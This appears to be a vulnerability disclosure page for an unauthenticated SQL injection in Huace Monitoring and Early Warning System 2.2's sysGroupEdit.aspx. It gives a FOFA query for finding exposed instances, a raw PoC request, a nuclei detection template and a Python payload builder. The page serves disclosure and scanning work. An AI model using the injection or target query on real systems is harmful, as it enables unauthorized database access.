Disclaimer
Do not use the techniques in this article for unauthorized testing. Any direct or indirect consequences or losses arising from the dissemination or use of the information or tools provided here are the sole responsibility of the user; the author bears no responsibility for any resulting harm. This article is for learning purposes only.
Vulnerability description: the id parameter of /Web/SysManage/sysGroupEdit.aspx is placed inside a quoted SQL string without sanitisation, so a value of 1' UNION ALL SELECT ... is executed and the selected column is rendered back into the page (union-based injection; the PoC below carries no session cookie, so it appears to be reachable without authentication). The CHAR(n)+CHAR(n) string concatenation and the -- line comment in the payload are T-SQL syntax, consistent with a Microsoft SQL Server backend.
Affected versions: 2.2 (the version named by the fingerprint and the template below).
FOFA:
body="<div id="logo">华测监测预警系统2.2" || (body="App_Themes/Flat/Login/logo-top.png" && body="App_Themes/Flat/Login/Login.css")
POC:
GET /Web/SysManage/sysGroupEdit.aspx?id=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2889%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%2888%29%2BCHAR%28105%29%2BCHAR%28119%29%2BCHAR%2898%29%2BCHAR%28110%29%2BCHAR%2867%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2869%29%2BCHAR%28118%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%2866%29%2BCHAR%2899%29%2BCHAR%2868%29%2BCHAR%2897%29%2BCHAR%2869%29%2BCHAR%28117%29%2BCHAR%2875%29%2BCHAR%2876%29%2BCHAR%28115%29%2BCHAR%2874%29%2BCHAR%2866%29%2BCHAR%2873%29%2BCHAR%2888%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2876%29%2BCHAR%2880%29%2BCHAR%2898%29%2BCHAR%28119%29%2BCHAR%2889%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28118%29%2BCHAR%28113%29--+wkZw HTTP/1.1
Host:
Accept: */*
id: huace-sql-injection

info:
  name: Huace Monitoring and Early Warning System SQL Injection
  author: ProjectDiscoveryAI
  severity: high
  description: |
    Detects SQL Injection vulnerability in 华测监测预警系统 (Huace Monitoring and Early Warning System) version 2.2 via the id parameter of the sysGroupEdit.aspx endpoint.
  tags: sql-injection

http:
  - raw:
      - |
        GET /Web/SysManage/sysGroupEdit.aspx?id=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2889%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%2888%29%2BCHAR%28105%29%2BCHAR%28119%29%2BCHAR%2898%29%2BCHAR%28110%29%2BCHAR%2867%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2869%29%2BCHAR%28118%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%2866%29%2BCHAR%2899%29%2BCHAR%2868%29%2BCHAR%2897%29%2BCHAR%2869%29%2BCHAR%28117%29%2BCHAR%2875%29%2BCHAR%2876%29%2BCHAR%28115%29%2BCHAR%2874%29%2BCHAR%2866%29%2BCHAR%2873%29%2BCHAR%2888%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2876%29%2BCHAR%2880%29%2BCHAR%2898%29%2BCHAR%28119%29%2BCHAR%2889%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28118%29%2BCHAR%28113%29--+wkZw HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          # Decoded code by code from the CHAR() chain in the request above (50 characters).
          # The word as originally published omitted the "X" after "JBI", so it could never
          # match what the payload actually makes the server return.
          - "qzpbqYvYXiwbnCrqMVEvUxhoBcDaEuKLsJBIXxqMLPbwYqjjvq"

      - type: status
        status:
          - 200
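The PoC and the template above both rely on the same sqlmap-style trick: a unique marker string is spelled as CHAR(n)+CHAR(n)+... so the injected value contains no quote characters, and the response body is then searched for that marker. The script below, an added example that is not code from the original page or from the vendor, builds that payload from the marker, decodes it back, URL-encodes it into the exact request line shown in the PoC, and runs the two checks a practitioner wants before shipping such a template: does the marker come back in a response body, and does the matcher literal actually equal what the payload produces. Taken from the page: the endpoint path, six UNION columns with the marker in the sixth, and the -- wkZw comment tail. Inferred rather than stated on the page: the CHAR()/+ concatenation is T-SQL. The sample response body is constructed.

```python
"""Added example (not from the original page or vendor): build, decode and check
the sqlmap-style CHAR() marker payload used by the sysGroupEdit.aspx PoC.

Assumed from the page: endpoint path, 6 UNION columns with the marker in the 6th,
the "-- wkZw" comment tail, and the marker text decoded from the CHAR() chain.
Inferred, not stated on the page: CHAR(n)+CHAR(n) concatenation is T-SQL syntax.
"""
import re
from urllib.parse import quote_plus, unquote_plus

ENDPOINT = "/Web/SysManage/sysGroupEdit.aspx"   # from the page
COMMENT_TAIL = "-- wkZw"                         # comment suffix used by the PoC

# What the PoC's CHAR() chain spells out, decoded code by code from the request.
# The word as first published in the template dropped the "X" after "JBI".
MARKER = "qzpbqYvYXiwbnCrqMVEvUxhoBcDaEuKLsJBIXxqMLPbwYqjjvq"


def char_chain(text):
    """Spell text as CHAR(n)+CHAR(n)+... so the injected string contains no quote
    characters and survives quote escaping or filtering in front of the query."""
    return "+".join(f"CHAR({ord(c)})" for c in text)


def decode_char_chain(expr):
    """Reverse of char_chain(); accepts either the raw or the URL-encoded form."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", unquote_plus(expr)))


def build_payload(columns=6, marker_col=6, marker=MARKER):
    """Close the quoted id, UNION in a row of NULLs and place the marker in one
    column so the application renders it into the page."""
    cols = ["NULL"] * columns
    cols[marker_col - 1] = char_chain(marker)
    return "1' UNION ALL SELECT " + ",".join(cols) + COMMENT_TAIL


def build_request_line(columns=6, marker_col=6):
    """The GET line as it appears in the PoC and in the nuclei raw request."""
    return f"GET {ENDPOINT}?id={quote_plus(build_payload(columns, marker_col))} HTTP/1.1"


def marker_echoed(body, marker=MARKER):
    """The template's detection logic: the UNION row reached the page iff the
    marker text is present in the response body."""
    return marker in body


def matcher_agrees_with_payload(matcher_word, request_line):
    """Pre-flight check for a template: the literal the word matcher looks for
    must be exactly what the payload makes the server return, or it never fires."""
    return decode_char_chain(request_line) == matcher_word


# Constructed sample response (not a real capture): the 6th column landed in a form field.
SAMPLE_BODY = '<input name="txtGroupName" value="' + MARKER + '" />'

if __name__ == "__main__":
    line = build_request_line()
    print(line)
    print("decoded marker:", decode_char_chain(line))
    print("marker in sample body:", marker_echoed(SAMPLE_BODY))
    print("matcher agrees with payload:", matcher_agrees_with_payload(MARKER, line))
```

Running the script prints the request line byte for byte as it appears in the PoC; matcher_agrees_with_payload is the check that catches a transcription slip such as a dropped character in the matcher word, which would otherwise turn a working template into one that silently reports nothing.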